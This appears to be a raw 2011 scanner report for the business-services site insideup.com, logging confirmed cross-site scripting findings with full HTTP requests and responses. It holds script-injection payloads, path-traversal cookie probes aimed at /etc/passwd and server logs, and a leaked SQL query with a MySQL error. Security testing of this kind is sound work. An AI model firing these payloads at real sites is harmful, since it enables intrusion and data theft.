Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E

/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter    Type      Value
URI-BASED    Raw URI   '"--></style></script><script>alert(0x00055F)</script>

Request

GET /ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055F)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=da5e964dmei3hh34nohv048eg4; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>' OR prj.project_page_url = 'leadflow/phsy00/'"--></style></script><script>netsparker(0x00055F)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00055F)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?'"--></style></script><script>alert(0x00056E..

Parameters

Parameter      Type          Value
catId          GET           20001
iusrc          GET           iupsc
Query Based    QUERYSTRING   '"--></style></script><script>alert(0x00056E)</script>

Request

GET /ppc/leadflow/wede00/project.php?'"--></style></script><script>netsparker(0x00056E)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ngsj5vhoaeqathg7tf7gv6tco7; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


